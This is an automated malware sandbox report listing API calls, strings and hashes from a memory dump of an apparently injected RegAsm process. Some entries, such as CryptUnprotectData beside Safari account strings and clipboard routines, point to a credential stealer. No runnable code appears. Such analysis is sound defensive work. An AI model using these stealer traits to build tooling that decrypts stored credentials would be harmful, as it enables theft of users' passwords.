                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                APIs
                                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: EnumNamesResource
                                                                • String ID:
                                                                • API String ID: 3334572018-0
                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                APIs
                                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CloseFind
                                                                • String ID:
                                                                • API String ID: 1863332320-0
                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                APIs
                                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                APIs
                                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                APIs
                                                                • memset.MSVCRT ref: 004095FC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 3655998216-0
                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                APIs
                                                                • memset.MSVCRT ref: 00445426
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                • String ID:
                                                                • API String ID: 1828521557-0
                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                APIs
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                • memcpy.MSVCRT ref: 00406942
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@FilePointermemcpy
                                                                • String ID:
                                                                • API String ID: 609303285-0
                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp
                                                                • String ID:
                                                                • API String ID: 2081463915-0
                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                APIs
                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                • String ID:
                                                                • API String ID: 2136311172-0
                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                APIs
                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                • API String ID: 1936579350-0
                                                                • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                APIs
                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                • String ID:
                                                                • API String ID: 2565263379-0
                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                APIs
                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                • wcslen.MSVCRT ref: 0040988F
                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                • memcpy.MSVCRT ref: 004098B5
                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                • String ID:
                                                                • API String ID: 2014503067-0
                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                • String ID: OsError 0x%x (%u)
                                                                • API String ID: 403622227-2664311388
                                                                • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                APIs
                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                • memset.MSVCRT ref: 0040265F
                                                                • memcpy.MSVCRT ref: 0040269B
                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                • memcpy.MSVCRT ref: 004026FF
                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                • API String ID: 2257402768-1134094380
                                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                • API String ID: 2787044678-1921111777
                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
